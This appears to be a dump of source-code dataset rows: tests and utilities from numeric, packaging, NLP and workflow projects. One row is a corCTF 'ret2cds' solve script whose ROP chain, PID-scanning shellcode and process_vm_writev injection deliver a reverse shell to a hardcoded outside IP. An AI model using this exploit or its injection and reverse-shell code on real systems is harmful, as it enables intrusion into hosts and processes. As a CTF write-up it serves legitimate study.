blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2263d8eda07b68d70ae9b2c9b01d7747b80e88d8
|
b9c01a2ae09be278f1b71fdcd7dcf2ed0b8f0add
|
/tests/integration/test_array.py
|
7adb8b093c6524a09f85065ead1ff98eb419674f
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
nv-legate/cunumeric
|
aae3e9232edef915e5bcb84f3f216fcc99b648e4
|
8dddd18022055374f51e1728e81a49958908e04a
|
refs/heads/branch-23.09
| 2023-09-03T21:17:13.274085
| 2023-09-01T01:07:21
| 2023-09-01T01:07:21
| 356,975,888
| 447
| 56
|
Apache-2.0
| 2023-09-12T20:41:20
| 2021-04-11T20:46:50
|
Python
|
UTF-8
|
Python
| false
| false
| 4,995
|
py
|
test_array.py
|
# Copyright 2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from legate.core import LEGATE_MAX_DIM
import cunumeric as num
SCALARS = (
0,
-10.5,
1 + 1j,
)
ARRAYS = (
[],
(1, 2),
((1, 2),),
[(1, 2), (3, 4.1)],
(
[1, 2.1],
[3, 4 + 4j],
),
)
def strict_type_equal(a, b):
return np.array_equal(a, b) and a.dtype == b.dtype
@pytest.mark.parametrize(
"obj",
(None,) + SCALARS + ARRAYS,
ids=lambda obj: f"(object={obj})",
)
def test_array_basic(obj):
res_np = np.array(obj)
res_num = num.array(obj)
assert strict_type_equal(res_np, res_num)
def test_array_ndarray():
obj = [[1, 2], [3, 4]]
res_np = np.array(np.array(obj))
res_num = num.array(num.array(obj))
assert strict_type_equal(res_np, res_num)
DTYPES = (
np.int32,
np.float64,
np.complex128,
)
@pytest.mark.parametrize("dtype", DTYPES, ids=lambda dtype: f"(dtype={dtype})")
@pytest.mark.parametrize(
"obj",
(0, -10.5, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_array_dtype(obj, dtype):
res_np = np.array(obj, dtype=dtype)
res_num = num.array(obj, dtype=dtype)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"ndmin",
range(-1, LEGATE_MAX_DIM + 1),
ids=lambda ndmin: f"(ndmin={ndmin})",
)
@pytest.mark.parametrize(
"obj",
(0, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_array_ndmin(obj, ndmin):
res_np = np.array(obj, ndmin=ndmin)
res_num = num.array(obj, ndmin=ndmin)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"copy", (True, False), ids=lambda copy: f"(copy={copy})"
)
def test_array_copy(copy):
x = [[1, 2, 3], [4, 5, 6]]
x_np = np.array(x)
xc_np = np.array(x_np, copy=copy)
x_np[0, :] = [7, 8, 9]
x_num = num.array(x)
xc_num = num.array(x_num, copy=copy)
x_num[0, :] = [7, 8, 9]
assert strict_type_equal(xc_np, xc_num)
class TestArrayErrors:
@pytest.mark.parametrize(
"dtype", (np.int32, np.float64), ids=lambda dtype: f"(dtype={dtype})"
)
@pytest.mark.parametrize(
"obj",
(1 + 1j, [1, 2, 3.0, 4 + 4j]),
ids=lambda obj: f"(obj={obj})",
)
def test_invalid_dtype(self, obj, dtype):
expected_exc = TypeError
with pytest.raises(expected_exc):
np.array(obj, dtype=dtype)
with pytest.raises(expected_exc):
num.array(obj, dtype=dtype)
@pytest.mark.parametrize(
"obj",
(None,) + SCALARS + ARRAYS,
ids=lambda obj: f"(object={obj})",
)
def test_asarray_basic(obj):
res_np = np.asarray(obj)
res_num = num.asarray(obj)
assert strict_type_equal(res_np, res_num)
def test_asarray_ndarray():
obj = [[1, 2], [3, 4]]
res_np = np.asarray(np.array(obj))
res_num = num.asarray(num.array(obj))
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize("dtype", DTYPES, ids=lambda dtype: f"(dtype={dtype})")
@pytest.mark.parametrize(
"obj",
(0, -10.5, [], [1, 2], [[1, 2], [3, 4.1]]),
ids=lambda obj: f"(object={obj})",
)
def test_asarray_dtype(obj, dtype):
res_np = np.asarray(obj, dtype=dtype)
res_num = num.asarray(obj, dtype=dtype)
assert strict_type_equal(res_np, res_num)
@pytest.mark.parametrize(
"src_dtype, tgt_dtype",
((np.int32, np.complex128), (np.float64, np.int64)),
ids=str,
)
@pytest.mark.parametrize("func", ("array", "asarray"), ids=str)
def test_ndarray_dtype(src_dtype, tgt_dtype, func):
shape = (1, 3, 1)
arr_np = np.ndarray(shape, dtype=src_dtype)
arr_num = num.array(arr_np)
res_np = getattr(np, func)(arr_np, dtype=tgt_dtype)
res_num = getattr(num, func)(arr_num, dtype=tgt_dtype)
assert strict_type_equal(res_np, res_num)
class TestAsArrayErrors:
@pytest.mark.parametrize(
"dtype", (np.int32, np.float64), ids=lambda dtype: f"(dtype={dtype})"
)
@pytest.mark.parametrize(
"obj",
(1 + 1j, [1, 2, 3.0, 4 + 4j]),
ids=lambda obj: f"(object={obj})",
)
def test_invalid_dtype(self, obj, dtype):
expected_exc = TypeError
with pytest.raises(expected_exc):
np.asarray(obj, dtype=dtype)
with pytest.raises(expected_exc):
num.asarray(obj, dtype=dtype)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv))
|
496cc0281595927c854a4a36e1d8261a7c2894ad
|
3ee5bf329a2e58eb9f775ec5ee6a329fd3541e36
|
/scrapy/http/common.py
|
bc8861574f27b054eb7c9fc86e2f6a10b0c45882
|
[
"BSD-3-Clause"
] |
permissive
|
scrapy/scrapy
|
53bd79e500e2cb7441d33bfd61ba003962d5fb46
|
cddb8c15d66831dc4e1bc4b745fcc6c534bb03dc
|
refs/heads/master
| 2023-08-31T04:08:06.193342
| 2023-08-30T18:29:54
| 2023-08-30T18:29:54
| 529,502
| 47,472
| 12,120
|
BSD-3-Clause
| 2023-09-14T12:08:07
| 2010-02-22T02:01:14
|
Python
|
UTF-8
|
Python
| false
| false
| 240
|
py
|
common.py
|
def obsolete_setter(setter, attrname):
def newsetter(self, value):
c = self.__class__.__name__
msg = f"{c}.{attrname} is not modifiable, use {c}.replace() instead"
raise AttributeError(msg)
return newsetter
|
5210af0064245d8b188e0e3d809bbeee61edfe97
|
44ba493efd0fd7ae78880d3d93cc0d66166935e5
|
/tests/platforms/linux/flatpak/test_create.py
|
0f977a8d3f79ef46db8733b7567ad4157e647315
|
[
"BSD-3-Clause"
] |
permissive
|
beeware/briefcase
|
1b3eaebf0791728c68986809aa07abc436e422c6
|
cc2dae1ffc58f9700d0ca57461cb05909bc01bec
|
refs/heads/main
| 2023-09-01T19:24:15.424713
| 2023-09-01T04:35:53
| 2023-09-01T04:35:53
| 39,841,700
| 1,609
| 256
|
BSD-3-Clause
| 2023-09-11T10:04:34
| 2015-07-28T15:20:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,844
|
py
|
test_create.py
|
from unittest.mock import MagicMock
import pytest
from briefcase.console import Console, Log
from briefcase.exceptions import BriefcaseConfigError, UnsupportedHostError
from briefcase.integrations.flatpak import Flatpak
from briefcase.platforms.linux.flatpak import LinuxFlatpakCreateCommand
@pytest.fixture
def create_command(tmp_path):
return LinuxFlatpakCreateCommand(
logger=Log(),
console=Console(),
base_path=tmp_path / "base_path",
data_path=tmp_path / "briefcase",
)
@pytest.mark.parametrize("host_os", ["Darwin", "Windows", "WeirdOS"])
def test_unsupported_host_os(create_command, host_os):
"""Error raised for an unsupported OS."""
create_command.tools.host_os = host_os
with pytest.raises(
UnsupportedHostError,
match="Flatpaks can only be built on Linux.",
):
create_command()
def test_output_format_template_context(create_command, first_app_config):
"""The template context is provided flatpak details."""
first_app_config.flatpak_runtime = "org.beeware.Platform"
first_app_config.flatpak_runtime_version = "37.42"
first_app_config.flatpak_sdk = "org.beeware.SDK"
assert create_command.output_format_template_context(first_app_config) == {
"flatpak_runtime": "org.beeware.Platform",
"flatpak_runtime_version": "37.42",
"flatpak_sdk": "org.beeware.SDK",
}
def test_missing_runtime_config(create_command, first_app_config):
"""The app creation errors is a Flatpak runtime is not defined."""
create_command.tools.flatpak = MagicMock(spec_set=Flatpak)
with pytest.raises(
BriefcaseConfigError,
match="Briefcase configuration error: The App does not specify the Flatpak runtime to use",
):
create_command.output_format_template_context(first_app_config)
|
a177abe57e8437ded1b3ca45927e0a56f0304ece
|
b8b1245cd42d76bbf07f618a6ac164f5b93e8652
|
/nnmnkwii/autograd/__init__.py
|
5a53e4313ca054f3c875c8c2eceec93268bff191
|
[
"MIT"
] |
permissive
|
r9y9/nnmnkwii
|
ff20074b27f8b3e8afb47a2e83c829e1869e24c9
|
def33752d2907d241c379574da1e1b5ae979cd99
|
refs/heads/master
| 2023-08-22T18:59:44.128812
| 2023-02-03T11:06:48
| 2023-02-03T11:06:48
| 96,328,821
| 410
| 88
|
NOASSERTION
| 2023-02-03T11:06:49
| 2017-07-05T14:33:50
|
Python
|
UTF-8
|
Python
| false
| false
| 260
|
py
|
__init__.py
|
from ._impl.mlpg import MLPG # noqa
from ._impl.mlpg import UnitVarianceMLPG # noqa
from ._impl.mlpg import mlpg # noqa
from ._impl.mlpg import unit_variance_mlpg # noqa
from ._impl.modspec import ModSpec # noqa
from ._impl.modspec import modspec # noqa
|
bdd7c61a0f404b51ad0bbe65c585642a05c975be
|
9abc1fe64663e658c1926f0e238004ce890437bf
|
/torcms_metadata/pycsw_helper/cfg_demo.py
|
19021fa1465124098e42193b1465297322a41b92
|
[
"MIT"
] |
permissive
|
bukun/TorCMS
|
e7a8a3a0e4e728e64d2a34c56d694e48e0e3a098
|
f9afae46a5029d213d5fb60850c93b37b813ae15
|
refs/heads/master
| 2023-08-31T05:37:35.861174
| 2023-08-29T02:41:12
| 2023-08-29T02:41:12
| 30,642,412
| 256
| 105
|
MIT
| 2023-07-20T02:24:20
| 2015-02-11T10:22:06
|
CSS
|
UTF-8
|
Python
| false
| false
| 83
|
py
|
cfg_demo.py
|
from peewee import SqliteDatabase
pycsw_db = SqliteDatabase('database/cite.db')
|
1f71c6c4ead8c8c21d6560c0bdf4216debdcb80c
|
2571ab21fd3b1281a534f0073a4229c9f215c20f
|
/jiant/tasks/lib/ccg.py
|
e21a9baf43c2c31919518165e544e00097ef6f66
|
[
"MIT"
] |
permissive
|
nyu-mll/jiant
|
5ed71cfef826e1e4c3b529371b1f40642a96ab48
|
daa5a258e3af5e7503288de8401429eaf3f58e13
|
refs/heads/master
| 2023-09-02T15:58:19.260599
| 2022-10-17T19:34:56
| 2022-10-17T19:34:56
| 137,789,266
| 1,289
| 302
|
MIT
| 2023-07-06T22:00:39
| 2018-06-18T18:12:47
|
Python
|
UTF-8
|
Python
| false
| false
| 5,553
|
py
|
ccg.py
|
import numpy as np
import torch
from dataclasses import dataclass
from typing import List, Union
from jiant.tasks.core import (
BaseExample,
BaseTokenizedExample,
BaseDataRow,
BatchMixin,
Task,
TaskTypes,
)
from jiant.tasks.lib.templates.shared import (
labels_to_bimap,
create_input_set_from_tokens_and_segments,
construct_single_input_tokens_and_segment_ids,
pad_single_with_feat_spec,
)
from jiant.tasks.lib.templates import hacky_tokenization_matching as tokenization_utils
from jiant.utils.python.io import read_json
@dataclass
class Example(BaseExample):
guid: str
text: str
tag_ids: List[int]
def tokenize(self, tokenizer):
tokenized = tokenizer.tokenize(self.text)
split_text = self.text.split(" ") # CCG data is space-tokenized
input_flat_stripped = tokenization_utils.input_flat_strip(split_text)
flat_stripped, indices = tokenization_utils.flat_strip(
tokens=tokenized,
tokenizer=tokenizer,
return_indices=True,
)
assert flat_stripped == input_flat_stripped
positions = tokenization_utils.map_tags_to_token_position(
flat_stripped=flat_stripped,
indices=indices,
split_text=split_text,
)
labels, label_mask = tokenization_utils.convert_mapped_tags(
positions=positions,
tag_ids=self.tag_ids,
length=len(tokenized),
)
return TokenizedExample(
guid=self.guid,
text=tokenizer.tokenize(self.text),
labels=labels,
label_mask=label_mask,
)
@dataclass
class TokenizedExample(BaseTokenizedExample):
guid: str
text: List
labels: List[Union[int, None]]
label_mask: List[int]
def featurize(self, tokenizer, feat_spec):
unpadded_inputs = construct_single_input_tokens_and_segment_ids(
input_tokens=self.text,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
input_set = create_input_set_from_tokens_and_segments(
unpadded_tokens=unpadded_inputs.unpadded_tokens,
unpadded_segment_ids=unpadded_inputs.unpadded_segment_ids,
tokenizer=tokenizer,
feat_spec=feat_spec,
)
# Replicate padding / additional tokens for the label ids and mask
if feat_spec.sep_token_extra:
label_suffix = [None, None]
mask_suffix = [0, 0]
special_tokens_count = 3 # CLS, SEP-SEP
else:
label_suffix = [None]
mask_suffix = [0]
special_tokens_count = 2 # CLS, SEP
unpadded_labels = (
[None] + self.labels[: feat_spec.max_seq_length - special_tokens_count] + label_suffix
)
unpadded_labels = [i if i is not None else -1 for i in unpadded_labels]
unpadded_label_mask = (
[0] + self.label_mask[: feat_spec.max_seq_length - special_tokens_count] + mask_suffix
)
padded_labels = pad_single_with_feat_spec(
ls=unpadded_labels,
feat_spec=feat_spec,
pad_idx=-1,
)
padded_label_mask = pad_single_with_feat_spec(
ls=unpadded_label_mask,
feat_spec=feat_spec,
pad_idx=0,
)
return DataRow(
guid=self.guid,
input_ids=np.array(input_set.input_ids),
input_mask=np.array(input_set.input_mask),
segment_ids=np.array(input_set.segment_ids),
label_ids=np.array(padded_labels),
label_mask=np.array(padded_label_mask),
tokens=unpadded_inputs.unpadded_tokens,
)
@dataclass
class DataRow(BaseDataRow):
guid: str
input_ids: np.ndarray
input_mask: np.ndarray
segment_ids: np.ndarray
label_ids: np.ndarray
label_mask: np.ndarray
tokens: list
@dataclass
class Batch(BatchMixin):
input_ids: torch.LongTensor
input_mask: torch.LongTensor
segment_ids: torch.LongTensor
label_ids: torch.LongTensor
label_mask: torch.LongTensor
tokens: list
class CCGTask(Task):
Example = Example
TokenizedExample = Example
DataRow = DataRow
Batch = Batch
TASK_TYPE = TaskTypes.TAGGING
LABELS = range(1363)
LABEL_TO_ID, ID_TO_LABEL = labels_to_bimap(LABELS)
@property
def num_labels(self):
return 1363
def get_train_examples(self):
return self._create_examples(path=self.train_path, set_type="train")
def get_val_examples(self):
return self._create_examples(self.val_path, set_type="val")
def get_test_examples(self):
return self._create_examples(path=self.test_path, set_type="test")
def get_tags_to_id(self):
tags_to_id = read_json(self.path_dict["tags_to_id"])
tags_to_id = {k: int(v) for k, v in tags_to_id.items()}
return tags_to_id
def _create_examples(self, path, set_type):
tags_to_id = self.get_tags_to_id()
examples = []
with open(path, "r") as f:
for i, line in enumerate(f):
text, tags = line.strip().split("\t")
split_tags = tags.split()
tag_ids = [tags_to_id[tag] for tag in split_tags]
examples.append(
Example(
guid="%s-%s" % (set_type, i),
text=text,
tag_ids=tag_ids,
)
)
return examples
|
5d78f06056f08d6be52b766dc4935c121a9fb701
|
ff4ce3522d502248f56b32438b303c3301185709
|
/cwltool/cuda.py
|
719bfd8677f1d7581b6bd89df89ff171de9c6fc3
|
[
"Apache-2.0"
] |
permissive
|
common-workflow-language/cwltool
|
d8304f3dcd6e31bda6d0ea11452b692987e39b28
|
bd89c5694685bff46bf56fb32316c8f6fe0d799d
|
refs/heads/main
| 2023-08-24T09:43:39.331516
| 2023-08-23T15:05:17
| 2023-08-23T16:45:11
| 43,816,051
| 336
| 258
|
Apache-2.0
| 2023-09-13T10:55:19
| 2015-10-07T13:03:05
|
Python
|
UTF-8
|
Python
| false
| false
| 2,341
|
py
|
cuda.py
|
"""Support utilities for CUDA."""
import subprocess # nosec
import xml.dom.minidom # nosec
from typing import Tuple
from .loghandler import _logger
from .utils import CWLObjectType
def cuda_version_and_device_count() -> Tuple[str, int]:
"""Determine the CUDA version and number of attached CUDA GPUs."""
try:
out = subprocess.check_output(["nvidia-smi", "-q", "-x"]) # nosec
except Exception as e:
_logger.warning("Error checking CUDA version with nvidia-smi: %s", e)
return ("", 0)
dm = xml.dom.minidom.parseString(out) # nosec
ag = dm.getElementsByTagName("attached_gpus")
if len(ag) < 1 or ag[0].firstChild is None:
_logger.warning(
"Error checking CUDA version with nvidia-smi. Missing 'attached_gpus' or it is empty.: %s",
out,
)
return ("", 0)
ag_element = ag[0].firstChild
cv = dm.getElementsByTagName("cuda_version")
if len(cv) < 1 or cv[0].firstChild is None:
_logger.warning(
"Error checking CUDA version with nvidia-smi. Missing 'cuda_version' or it is empty.: %s",
out,
)
return ("", 0)
cv_element = cv[0].firstChild
if isinstance(cv_element, xml.dom.minidom.Text) and isinstance(
ag_element, xml.dom.minidom.Text
):
return (cv_element.data, int(ag_element.data))
_logger.warning(
"Error checking CUDA version with nvidia-smi. "
"Either 'attached_gpus' or 'cuda_version' was not a text node: %s",
out,
)
return ("", 0)
def cuda_check(cuda_req: CWLObjectType, requestCount: int) -> int:
try:
vmin = float(str(cuda_req["cudaVersionMin"]))
version, devices = cuda_version_and_device_count()
if version == "":
# nvidia-smi not detected, or failed some other way
return 0
versionf = float(version)
if versionf < vmin:
_logger.warning("CUDA version '%s' is less than minimum version '%s'", version, vmin)
return 0
if requestCount > devices:
_logger.warning("Requested %d GPU devices but only %d available", requestCount, devices)
return 0
return requestCount
except Exception as e:
_logger.warning("Error checking CUDA requirements: %s", e)
return 0
|
0544962f867fbbba5f72d94be06d599b1bfc79a1
|
bc371b9238956bc00cc33654b1d68651c6edf371
|
/writeups/2021/corCTF/ret2cds/chall/solve.py
|
aa79e0c645d2017ff1ff6d876e8b2e1748471193
|
[
"MIT"
] |
permissive
|
welchbj/ctf
|
447202921fbf5c467af62b4f72f5f489c7c471f0
|
3b54769a8312f755eb97e7b4c954e4b5829af8e1
|
refs/heads/master
| 2023-08-19T03:28:33.264186
| 2023-08-11T18:38:17
| 2023-08-11T18:38:17
| 213,223,536
| 167
| 28
|
MIT
| 2023-04-18T13:29:33
| 2019-10-06T18:42:03
|
Python
|
UTF-8
|
Python
| false
| false
| 10,124
|
py
|
solve.py
|
#!/usr/bin/env python3
from pwn import *
the_binary = "./ret2cds"
context.binary = the_binary
elf = context.binary
libc = ELF("./libc.so.6", checksec=False)
context.terminal = ["tmux", "splitw", "-h"]
if args.REMOTE:
io = remote(args.HOST, int(args.PORT))
elif args.STRACE:
io = process(["strace", "-o", "trace.txt", the_binary])
else:
io = process(the_binary)
if args.GDB:
gdb.attach(io, f"""
file {the_binary}
break *0x4012ba
ignore 1 2
# set breakpoint pending on
# break *0xdead0000
continue
""")
def libc_off(offset):
return libc.address + offset
class Gadgets:
elf_main = 0x40123a
# 0x0000000000401016: ret;
ret = 0x0000000000401016
# 0x000000000040131b: pop rdi; ret;
pop_rdi = 0x000000000040131b
# 0x0000000000401319: pop rsi; pop r15; ret;
pop_rsi_pop_r15 = 0x0000000000401319
# 0x00000000001626d6: pop rdx; pop rbx; ret;
@property
def pop_rdx_pop_rbx(self):
return libc_off(0x00000000001626d6)
# 0x000000000004a550: pop rax; ret;
@property
def pop_rax(self):
return libc_off(0x000000000004a550)
# 0x00000000001536e9: pop rax; call rax;
@property
def pop_rax_call_rax(self):
return libc_off(0x00000000001536e9)
# 0x0000000000156108: mov r8, rax; mov rax, r8; pop rbx; ret;
@property
def mov_r8_rax_mov_rax_r8_pop_rbx(self):
return libc_off(0x0000000000156108)
# 0x000000000007d2f0: mov r9, rax; pop r12; pop r13; mov rax, r9; pop r14; ret;
@property
def mov_r9_rax_pop_r12_pop_r13_mov_rax_r9_pop_r14(self):
return libc_off(0x000000000007d2f0)
# 0x000000000007b0cb: mov r10, rdx; jmp rax;
@property
def mov_r10_rdx_jmp_rax(self):
return libc_off(0x000000000007b0cb)
# 0x0000000000066229: syscall; ret;
@property
def syscall(self):
return libc_off(0x0000000000066229)
class Const:
rip_offset = 0x108
SYS_process_vm_readv = 310
SYS_process_vm_writev = 311
mmap_base = 0xdead0000
iovec_local = 0xdead3000
iovec_remote = 0xdead6000
iovec_size = 0x3000
mmap_size = 0x9000
hello_msg = "hello"
msg_prologue = "__mbegin__"
msg_epilogue = "__mend__"
process_read_err = "pread err"
process_write_err = "pwrite err"
# CDS leads to RWX segment at static address, more context here:
# https://docs.oracle.com/javase/8/docs/technotes/guides/vm/class-data-sharing.html
cds_rwx_base = 0x800000000
cds_len_to_read = 1
cds_rwx_size = 0x2000
# final_payload_listen_host = "172.17.0.1"
final_payload_listen_host = "137.184.74.226"
final_payload_listen_port = 80
shellcode = f"""
jmp do_it
hello_msg:
.string "{Const.hello_msg}"
.byte 0
process_read_err:
.string "{Const.process_read_err}"
.byte 0
process_write_err:
.string "{Const.process_write_err}"
.byte 0
msg_prologue:
.string "{Const.msg_prologue}"
.byte 0
msg_epilogue:
.string "{Const.msg_epilogue}"
.byte 0
do_it:
lea rdi,[rip+hello_msg]
mov rsi,{len(Const.hello_msg)}
call echo_msg
/* Read process mem loop to find target process PID. */
mov rbx,1
pid_search_loop:
/* Main loop, current PID search value expected in rbx. */
push rbx
mov rdi,rbx
mov rsi,{hex(Const.cds_rwx_base)}
mov rdx,1
call read_process_mem
cmp rax,1
jne bad_pread
/* We found the PID. Send it to ourselves and then jump to writing
shellcode into its address space. */
lea rdi,[rsp]
mov rsi,8
call echo_msg
pop rbx
jmp write_shellcode
bad_pread:
/* Didn't find the PID, increment our counter and continue the search. */
pop rbx
inc rbx
jmp pid_search_loop
/* Write shellcode to the identified parent process. Expects the target
PID in rbx. */
write_shellcode:
mov rdi,rbx
lea rsi,[rip+final_shellcode]
mov rdx,the_end - final_shellcode
mov r10,{hex(Const.cds_rwx_base)}
call write_process_mem
call exit
/* Args:
- rdi: Address holding the data to print.
- rsi: Length of data to print.
*/
echo_data:
mov rdx,rsi
mov rsi,rdi
mov rdi,STDOUT_FILENO
mov rax,SYS_write
syscall
ret
echo_prologue:
lea rdi,[rip+msg_prologue]
mov rsi,{len(Const.msg_prologue)}
call echo_data
ret
echo_epilogue:
lea rdi,[rip+msg_epilogue]
mov rsi,{len(Const.msg_epilogue)}
call echo_data
ret
/* Same as echo_data, but prepends and appends a message prologue/epilogue. */
echo_msg:
push rdi
push rsi
call echo_prologue
pop rsi
pop rdi
call echo_data
call echo_epilogue
ret
/* Args:
- rdi: PID of process whose memory to read.
- rsi: Memory address to read from
- rdx: Length of region to read
Returns: 1 on success, 0 on error.
*/
read_process_mem:
mov rcx,rsi
mov rbx,rdx
/* Setup local iovec, indicating where to write the data read from the
remote process. */
mov rsi,{hex(Const.iovec_local)}
mov dword ptr [rsi+0],{hex(Const.iovec_local+0x10)}
mov [rsi+8],rbx
mov rdx,1
/* Setup remote iovec, indicating where we want to read from in the remote
process. */
mov r10,{hex(Const.iovec_remote)}
mov [r10+0],rcx
mov [r10+8],rbx
mov r8,{Const.cds_len_to_read}
/* No flags. */
mov r9,0
/* Do the syscall. */
mov rax,{Const.SYS_process_vm_readv}
syscall
/* rax now holds how many bytes were read from the remote process memory,
or -1 on error. */
cmp rax,0
jle read_process_mem_err
/* No error, write the process memory back to ourselves. */
mov rdi,{hex(Const.iovec_local+0x10)}
mov rsi,rax
call echo_msg
mov rax,1
ret
read_process_mem_err:
lea rdi,[rip+process_read_err]
mov rsi,{len(Const.process_read_err)}
call echo_msg
mov rax,0
ret
/* Args:
- rdi: PID of process whose memory to read.
- rsi: Local memory address containing data to write
- rdx: Length of data to write to remote process
- r10: Remote memory address to write to
Returns: 1 on success, 0 on error.
*/
write_process_mem:
mov rbx,rsi
mov rcx,rdx
mov r12,r10
/* Setup local iovec, indicating what local data should be written to the
remote process. */
mov rsi,{hex(Const.iovec_local)}
mov [rsi+0],rbx
mov [rsi+8],rcx
mov rdx,1
/* Setup remote iovec, indicating where we should be writing in the remote
process. */
mov r10,{hex(Const.iovec_remote)}
mov [r10+0],r12
mov [r10+8],rcx
mov r8,1
/* No flags. */
mov r9,0
/* Do the syscall. */
mov rax,{Const.SYS_process_vm_writev}
syscall
/* rax now holds how many bytes were written to the remote process memory,
or -1 on error. */
cmp rax,0
jle write_process_mem_err
/* No error, return success. */
mov rax,1
ret
write_process_mem_err:
lea rdi,[rip+process_write_err]
mov rsi,{len(Const.process_write_err)}
call echo_msg
mov rax,0
ret
exit:
mov rax,SYS_exit
syscall
final_shellcode:
.rept 100
nop
.endr
"""
shellcode += shellcraft.connect(Const.final_payload_listen_host, Const.final_payload_listen_port)
shellcode += shellcraft.dupsh()
shellcode += """
the_end:
nop
"""
shellcode = asm(shellcode, vma=Const.mmap_base)
def recv_shellcode_msg():
io.recvuntil(Const.msg_prologue)
msg = io.recvuntil(Const.msg_epilogue, drop=True)
return msg
g = Gadgets()
def do_rop(*gadgets):
chain = b""
chain += b"A"*Const.rip_offset
chain += flat(*gadgets)
assert len(chain) <= 0x200
io.sendafter("warden: ", chain)
if args.PAUSE:
input("Pausing before sending anything...")
# leak a libc address
do_rop(
g.pop_rdi,
constants.STDOUT_FILENO,
g.pop_rsi_pop_r15,
elf.got.read,
0xdeadbeef,
# rdx already equals 0x1d from the program's last write
elf.plt.write,
g.elf_main
)
io.recvuntil("escaping...\n")
leak = io.recvuntil("Welcome", drop=True)
libc_read = u64(leak[1:9])
libc.address = libc_read - libc.sym.read
log.info("read@libc: %#x" % libc_read)
log.info("libc base: %#x" % libc.address)
# map a rwx segment
do_rop(
# rdi = addr
g.pop_rdi,
Const.mmap_base,
# rsi = len
g.pop_rsi_pop_r15,
Const.mmap_size,
0xdeadbeef,
# r10 = flags
g.pop_rax,
g.ret,
g.pop_rdx_pop_rbx,
constants.MAP_PRIVATE | constants.MAP_FIXED | constants.MAP_ANON,
0xdeadbeef,
g.mov_r10_rdx_jmp_rax,
# rdx = prot; do this after r10 since r10's gadget clobbers rdx
g.pop_rdx_pop_rbx,
constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC,
0xdeadbeef,
# r8 = fd
g.pop_rax,
0xffffffffffffffff,
g.mov_r8_rax_mov_rax_r8_pop_rbx,
0xdeadbeef,
# r9 = off
g.pop_rax,
0,
g.mov_r9_rax_pop_r12_pop_r13_mov_rax_r9_pop_r14,
0xdeadbeef,
0xdeadbeef,
0xdeadbeef,
# rax = SYS_mmap
g.pop_rax,
constants.SYS_mmap,
g.syscall,
# back to main one last time...
g.elf_main
)
# read shellcode into the rwx segment and jump to it
do_rop(
# rdi = fd
g.pop_rdi,
constants.STDIN_FILENO,
# rsi = buf
g.pop_rsi_pop_r15,
Const.mmap_base,
0xdeadbeef,
# rdx = len
g.pop_rdx_pop_rbx,
len(shellcode),
0xdeadbeef,
# rax = SYS_read
g.pop_rax,
constants.SYS_read,
g.syscall,
# jump to shellcode
g.pop_rax_call_rax,
Const.mmap_base
)
sleep(5)
log.info("Sending shellcode...")
io.send(shellcode)
callback_io = listen(
bindaddr=Const.final_payload_listen_host,
port=Const.final_payload_listen_port
)
# Make sure our shellcode starts up as expected.
assert recv_shellcode_msg().decode() == Const.hello_msg
log.info("Got hello message from compromised ret2cds process")
# Barring a successful write into the target process's address space, we can
# now expect a reverse shell to our listener.
log.info("Waiting for callback...")
callback_io.wait_for_connection()
log.success("Got connection!")
callback_io.interactive()
|
941380ad326523db2d5fc57631a4e528699b944d
|
091a6200be74bf6577c86f623665bcc24e16b02b
|
/Sound_Reactive_NeoPixel_Peace_Pendant/code.py
|
fc832ce4e9bb784a6e2f4d290e83e8ed1ca855ac
|
[
"MIT"
] |
permissive
|
adafruit/Adafruit_Learning_System_Guides
|
b5f7bce40a16da64e7a79d4b39de032f2cca41d4
|
5eaa7a15a437c533b89f359a25983e24bb6b5438
|
refs/heads/main
| 2023-09-05T18:31:41.621956
| 2023-09-05T15:36:09
| 2023-09-05T15:36:09
| 105,065,494
| 937
| 937
|
MIT
| 2023-09-12T18:48:53
| 2017-09-27T20:22:44
|
C
|
UTF-8
|
Python
| false
| false
| 3,500
|
py
|
code.py
|
# SPDX-FileCopyrightText: 2017 Limor Fried for Adafruit Industries
#
# SPDX-License-Identifier: MIT
import array
from rainbowio import colorwheel
import board
import neopixel
from analogio import AnalogIn
led_pin = board.D0 # NeoPixel LED strand is connected to GPIO #0 / D0
n_pixels = 12 # Number of pixels you are using
dc_offset = 0 # DC offset in mic signal - if unusure, leave 0
noise = 100 # Noise/hum/interference in mic signal
samples = 60 # Length of buffer for dynamic level adjustment
